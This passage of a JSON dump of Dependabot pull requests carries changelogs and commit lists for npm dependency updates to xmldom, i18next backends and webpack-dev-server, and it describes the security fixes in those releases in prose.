behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e@​xmldom/xmldom's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003e0.8.13\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.9\"\u003e0.9.9\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimplement \u003ccode\u003eParentNode.children\u003c/code\u003e getter \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/960\"\u003e\u003ccode\u003e[#960](https://github.com/xmldom/xmldom/issues/960)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/410\"\u003e\u003ccode\u003e[#410](https://github.com/xmldom/xmldom/issues/410)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ecorrectly traverse ancestor chain in \u003ccode\u003eNode.contains\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/931\"\u003e\u003ccode\u003e[#931](https://github.com/xmldom/xmldom/issues/931)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/yoshi389111\"\u003e\u003ccode\u003e@​yoshi389111\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e5c14802592685bb872c042c54c3f73758875c85\"\u003e\u003ccode\u003ee5c1480\u003c/code\u003e\u003c/a\u003e 0.8.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/9611e20d75f059dc377f806a8f7ee7d1eaeaeb7c\"\u003e\u003ccode\u003e9611e20\u003c/code\u003e\u003c/a\u003e style: drop unused import in test file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/dc4dff3d1d0b5a6b97c52fcc1823a735b8821e62\"\u003e\u003ccode\u003edc4dff3\u003c/code\u003e\u003c/a\u003e docs: add 0.8.13 changelog entry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/842fa38deedd2d9a9c90d0ad54aa1be75d2a41bc\"\u003e\u003ccode\u003e842fa38\u003c/code\u003e\u003c/a\u003e fix: prevent stack overflow in normalize (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/aeff69f5a32e8c1bd540683da9e10718f84f595c\"\u003e\u003ccode\u003eaeff69f\u003c/code\u003e\u003c/a\u003e test: add normalize behavioral coverage to node.test.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbdb0d7db8ae70760bd4cc181cb8f30bb0cd9d88\"\u003e\u003ccode\u003ecbdb0d7\u003c/code\u003e\u003c/a\u003e fix: make walkDOM iterative to prevent stack overflow (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/0b543d31794dc198c86a0358574cb5dec29674c5\"\u003e\u003ccode\u003e0b543d3\u003c/code\u003e\u003c/a\u003e test: assert namespace declarations are isolated between siblings in serializ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c007c51909587990c962cf3d5c2acadf4c897b87\"\u003e\u003ccode\u003ec007c51\u003c/code\u003e\u003c/a\u003e refactor: migrate serializeToString to walkDOM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/2bb3899074820089d9e76ce28a5edfdacf425025\"\u003e\u003ccode\u003e2bb3899\u003c/code\u003e\u003c/a\u003e test: add serializeToString coverage for uncovered branches\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e69f38d0a58731152d300e8c8eb29506f5f488fe\"\u003e\u003ccode\u003ee69f38d\u003c/code\u003e\u003c/a\u003e refactor: migrate importNode to walkDOM\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.7.13...0.8.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `i18next-fs-backend` from 2.3.1 to 2.6.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/i18next/i18next-fs-backend/blob/master/CHANGELOG.md\"\u003ei18next-fs-backend's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e2.6.4\u003c/h3\u003e\n\u003cp\u003eSecurity release — all issues found via an internal audit. See published advisory \u003ca href=\"https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj\"\u003eGHSA-8847-338w-5hcj\u003c/a\u003e.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esecurity: refuse to build filesystem paths when \u003ccode\u003elng\u003c/code\u003e or \u003ccode\u003ens\u003c/code\u003e values contain \u003ccode\u003e..\u003c/code\u003e, path separators (\u003ccode\u003e/\u003c/code\u003e, \u003ccode\u003e\\\u003c/code\u003e), control characters, prototype keys (\u003ccode\u003e__proto__\u003c/code\u003e / \u003ccode\u003econstructor\u003c/code\u003e / \u003ccode\u003eprototype\u003c/code\u003e), or exceed 128 chars. Prevents arbitrary filesystem read / write via attacker-controlled language-code values. Any legitimate i18next language-code shape (BCP-47-like, underscores, hyphens, dots, \u003ccode\u003e+\u003c/code\u003e-joined multi-language requests) is still accepted (\u003ca href=\"https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj\"\u003eGHSA-8847-338w-5hcj\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edocs: new \u0026quot;Security considerations\u0026quot; README section — documents the filesystem-path sanitiser and clarifies the trust model around \u003ccode\u003e.js\u003c/code\u003e/\u003ccode\u003e.ts\u003c/code\u003e locale files (their content is \u003ccode\u003eeval\u003c/code\u003e-ed, so they must be treated as code). The \u003ccode\u003eeval\u003c/code\u003e behaviour itself is retained: dynamic expressions in \u003ccode\u003e.js\u003c/code\u003e/\u003ccode\u003e.ts\u003c/code\u003e locale files are an intentional feature, and safe replacements like \u003ccode\u003eimport()\u003c/code\u003e are async-only and not viable for this sync-capable code path.\u003c/li\u003e\n\u003cli\u003echore: ignore \u003ccode\u003e.env*\u003c/code\u003e and \u003ccode\u003e*.pem\u003c/code\u003e/\u003ccode\u003e*.key\u003c/code\u003e files in \u003ccode\u003e.gitignore\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.3\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse own interpolation function instead of relying on i18next's interpolator\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.1\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump js-yaml from 4.1.0 to 4.1.1 (\u003ca href=\"https://redirect.github.com/i18next/i18next-fs-backend/issues/64\"\u003e#64\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.6.0\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esupport \u003ccode\u003einitImmediate\u003c/code\u003e -\u0026gt; \u003ccode\u003einitAsync\u003c/code\u003e renaming of i18next v24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e2.5.0\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix for Deno 2 and removal of unnecessary .cjs file\u003c/li\u003e\n\u003cli\u003efor esm build environments not supporting top-level await, you should import the \u003ccode\u003ei18next-fs-backend/cjs\u003c/code\u003e export or stay at v2.4.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/7f623074a6d6239120c6349eacbd68de7e3c0b2f\"\u003e\u003ccode\u003e7f62307\u003c/code\u003e\u003c/a\u003e 2.6.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/adf8a307f660973761e4b4e9293ae646505ea3fa\"\u003e\u003ccode\u003eadf8a30\u003c/code\u003e\u003c/a\u003e security: hardening for 2.6.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/3bd0132fb314fd2fe569d24a9716fb6446a4db6c\"\u003e\u003ccode\u003e3bd0132\u003c/code\u003e\u003c/a\u003e update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/fd1616f8617cdee78cc82db698c8efe548f41b9e\"\u003e\u003ccode\u003efd1616f\u003c/code\u003e\u003c/a\u003e Bump fastify from 5.3.2 to 5.8.5 in /example/fastify (\u003ca href=\"https://redirect.github.com/i18next/i18next-fs-backend/issues/67\"\u003e#67\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/8b6a5ba4c53659fab07b0829296bfa8afeaf9d89\"\u003e\u003ccode\u003e8b6a5ba\u003c/code\u003e\u003c/a\u003e 2.6.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/957635d9aba1f59db6b6dcd79aa54be67432672e\"\u003e\u003ccode\u003e957635d\u003c/code\u003e\u003c/a\u003e use own interpolation function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/2771083a9d739c8d1456c3cbf6b76fc16ec025d2\"\u003e\u003ccode\u003e2771083\u003c/code\u003e\u003c/a\u003e 2.6.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/2cd2c20f113b531cc5908c9b5041781e8cd89403\"\u003e\u003ccode\u003e2cd2c20\u003c/code\u003e\u003c/a\u003e use own interpolation function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/b1e42e4f7bbb76becff65c0cfd744e594ac2e72f\"\u003e\u003ccode\u003eb1e42e4\u003c/code\u003e\u003c/a\u003e 2.6.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/i18next/i18next-fs-backend/commit/87d032b02ac9c8a34b2fcb9faa93d3cb1cdb291f\"\u003e\u003ccode\u003e87d032b\u003c/code\u003e\u003c/a\u003e build\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/i18next/i18next-fs-backend/compare/v2.3.1...v2.6.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `i18next-http-middleware` from 3.5.0 to 3.9.3\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/i18next/i18next-http-middleware/blob/master/CHANGELOG.md\"\u003ei18next-http-middleware's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/i18next/i18next-http-middleware/compare/v3.9.2...v3.9.3\"\u003ev3.9.3\u003c/a\u003e\u003c/h2\u003e\n\u003cp\u003eSecurity release — all issues found via an internal audit. See published GHSA advisories \u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw\"\u003eGHSA-5fgg-jcpf-8jjw\u003c/a\u003e and \u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg\"\u003eGHSA-c3h8-g69v-pjrg\u003c/a\u003e.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esecurity: guard \u003ccode\u003eutils.setPath\u003c/code\u003e against prototype pollution via crafted \u003ccode\u003elng\u003c/code\u003e/\u003ccode\u003ens\u003c/code\u003e in \u003ccode\u003egetResourcesHandler\u003c/code\u003e (\u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw\"\u003eGHSA-5fgg-jcpf-8jjw\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esecurity: sanitise \u003ccode\u003eContent-Language\u003c/code\u003e response header to prevent CRLF injection / unhandled \u003ccode\u003eERR_INVALID_CHAR\u003c/code\u003e crash via unsanitised language codes (\u003ca href=\"https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg\"\u003eGHSA-c3h8-g69v-pjrg\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esecurity: skip inherited/prototype-polluting keys (\u003ccode\u003e__proto__\u003c/code\u003e, \u003ccode\u003econstructor\u003c/code\u003e, \u003ccode\u003eprototype\u003c/code\u003e) in \u003ccode\u003emissingKeyHandler\u003c/code\u003e request body (\u003ca href=\"https://github.com/i18next/i...\n\n_Description has been truncated_","html_url":"https://github.com/imagelessthought/overleaf/pull/32","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imagelessthought%2Foverleaf/issues/32","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/32/packages"},{"uuid":"4528132367","node_id":"PR_kwDOCiLU2M7fm4v2","number":81,"state":"open","title":"Bump webpack-dev-server from 5.2.1 to 5.2.4","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-26T23:11:40.000Z","updated_at":"2026-05-27T00:10:26.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps [webpack-dev-server](https://github.com/webpack/webpack-dev-server) from 5.2.1 to 5.2.4.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug 